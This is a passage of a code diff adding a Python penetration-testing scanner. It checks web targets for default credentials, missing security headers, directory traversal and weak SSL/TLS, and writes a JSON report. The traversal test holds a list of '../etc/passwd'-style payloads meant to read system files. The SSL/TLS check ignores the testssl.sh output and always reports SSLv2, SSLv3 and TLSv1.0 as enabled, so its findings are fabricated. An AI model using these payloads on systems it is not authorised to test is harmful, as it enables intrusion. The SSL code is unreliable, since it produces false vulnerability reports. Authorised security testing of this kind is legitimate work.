+ vulnerability=f'Default credentials accepted: {username}/{password}',
136
+ evidence='Successful authentication with default credentials',
137
+ remediation='Enforce strong password policy and remove default accounts',
138
+ cvss_score=9.1
139
+ ))
140
+
141
+ except Exception as e:
142
+ print(f"Error testing credentials: {e}")
143
+
144
+ def test_security_headers(self, url: str) -> None:
145
+ """Test for missing security headers"""
146
+ print(f"Testing security headers on {url}")
147
+
148
+ try:
149
+ response = requests.get(url, timeout=5)
150
+
151
+ critical_headers = {
152
+ 'Strict-Transport-Security': 'HSTS not implemented',
153
+ 'X-Frame-Options': 'Clickjacking protection missing',
154
+ 'X-Content-Type-Options': 'MIME sniffing prevention missing',
155
+ 'Content-Security-Policy': 'CSP not implemented',
156
+ 'X-XSS-Protection': 'XSS protection header missing'
157
+ }
158
+
159
+ for header, description in critical_headers.items():
160
+ if header not in response.headers:
161
+ self.findings.append(Finding(
162
+ severity='medium',
163
+ category='Missing Security Header',
164
+ target=url,
165
+ vulnerability=f'Missing header: {header}',
166
+ evidence=description,
167
+ remediation=f'Add {header} header to all responses',
168
+ cvss_score=5.3
169
+ ))
170
+
171
+ except Exception as e:
172
+ print(f"Error testing headers: {e}")
173
+
174
+ def test_directory_traversal(self, url: str) -> None:
175
+ """Test for directory traversal vulnerabilities"""
176
+ print(f"Testing directory traversal on {url}")
177
+
178
+ payloads = [
179
+ '../../../etc/passwd',
180
+ '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
181
+ '....//....//....//etc/passwd',
182
+ '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd'
183
+ ]
184
+
185
+ for payload in payloads:
186
+ try:
187
+ response = requests.get(
188
+ url,
189
+ params={'file': payload},
190
+ timeout=5
191
+ )
192
+
193
+ # Check for Unix passwd file
194
+ if 'root:' in response.text or 'daemon:' in response.text:
195
+ self.findings.append(Finding(
196
+ severity='critical',
197
+ category='Directory Traversal',
198
+ target=url,
199
+ vulnerability=f'Path traversal detected with payload: {payload}',
200
+ evidence='System file contents exposed',
201
+ remediation='Validate and sanitize file paths, use whitelist approach',
202
+ cvss_score=8.6
203
+ ))
204
+ break
205
+
206
+ except Exception as e:
207
+ print(f"Error testing traversal: {e}")
208
+
209
+ def test_ssl_tls(self) -> None:
210
+ """Test SSL/TLS configuration"""
211
+ print(f"Testing SSL/TLS on {self.target}")
212
+
213
+ try:
214
+ result = subprocess.run(
215
+ ['testssl.sh', '--jsonfile', 'ssl-results.json', self.target],
216
+ capture_output=True,
217
+ text=True,
218
+ timeout=60
219
+ )
220
+
221
+ # Parse SSL test results
222
+ # This is a simplified check
223
+ weak_protocols = ['SSLv2', 'SSLv3', 'TLSv1.0']
224
+ for protocol in weak_protocols:
225
+ self.findings.append(Finding(
226
+ severity='high',
227
+ category='Weak SSL/TLS',
228
+ target=self.target,
229
+ vulnerability=f'Weak protocol enabled: {protocol}',
230
+ evidence='Outdated SSL/TLS protocol support',
231
+ remediation='Disable weak protocols, enforce TLS 1.2+',
232
+ cvss_score=7.5
233
+ ))
234
+
235
+ except Exception as e:
236
+ print(f"SSL test error: {e}")
237
+
238
+ def run_full_pentest(self, target_urls: List[str]) -> Dict:
239
+ """Execute comprehensive penetration test"""
240
+ for url in target_urls:
241
+ self.test_sql_injection(url)
242
+ self.test_xss(url)
243
+ self.test_security_headers(url)
244
+ self.test_directory_traversal(url)
245
+
246
+ self.test_ssl_tls()
247
+
248
+ return self.generate_report()
249
+
250
+ def generate_report(self) -> Dict:
251
+ """Generate comprehensive pentest report"""
252
+ summary = {
253
+ 'critical': 0,
254
+ 'high': 0,
255
+ 'medium': 0,
256
+ 'low': 0
257
+ }
258
+
259
+ for finding in self.findings:
260
+ if finding.severity in summary:
261
+ summary[finding.severity] += 1
262
+
263
+ report = {
264
+ 'timestamp': datetime.now().isoformat(),
265
+ 'target': self.target,
266
+ 'total_findings': len(self.findings),
267
+ 'summary': summary,
268
+ 'findings': [asdict(f) for f in self.findings],
269
+ 'risk_score': self._calculate_risk_score(),
270
+ 'recommendations': self._generate_recommendations()
271
+ }
272
+
273
+ with open('pentest-report.json', 'w') as f:
274
+ json.dump(report, f, indent=2)
275
+
276
+ return report
277
+
278
+ def _calculate_risk_score(self) -> float:
279
+ """Calculate overall risk score"""
280
+ if not self.findings:
281
+ return 0.0
282
+
283
+ total_cvss = sum(f.cvss_score for f in self.findings)
284
+ return round(total_cvss / len(self.findings), 2)
285
+
286
+ def _generate_recommendations(self) -> List[str]:
287
+ """Generate prioritized recommendations"""
288
+ recommendations = []
289
+
290
+ categories = {}
291
+ for finding in self.findings:
292
+ if finding.category not in categories:
293
+ categories[finding.category] = []
294
+ categories[finding.category].append(finding)
295
+
296
+ for category, findings in sorted(
297
+ categories.items(),
298
+ key=lambda x: len(x[1]),
299
+ reverse=True
300
+ ):
301
+ recommendations.append(
302
+ f"Address {len(findings)} {category} vulnerabilities"
303
+ )
304
+
305
+ return recommendations[:5]
306
+
307
+ # Usage
308
+ if __name__ == '__main__':
309
+ tester = PenetrationTester('https://example.com')
310
+
311
+ target_urls = [
312
+ 'https://example.com/api/users',
313
+ 'https://example.com/search',
314
+ 'https://example.com/download'
315
+ ]
316
+
317
+ report = tester.run_full_pentest(target_urls)
318
+
319
+ print("\n=== Penetration Test Report ===")
320
+ print(f"Target: {report['target']}")
321
+ print(f"Total Findings: {report['total_findings']}")
322
+ print(f"Risk Score: {report['risk_score']}")
323
+ print(f"\nFindings by Severity:")
324
+ print(f" Critical: {report['summary']['critical']}")
325
+ print(f" High: {report['summary']['high']}")
326
+ print(f" Medium: {report['summary']['medium']}")
327
+ print(f" Low: {report['summary']['low']}")
328
+ ```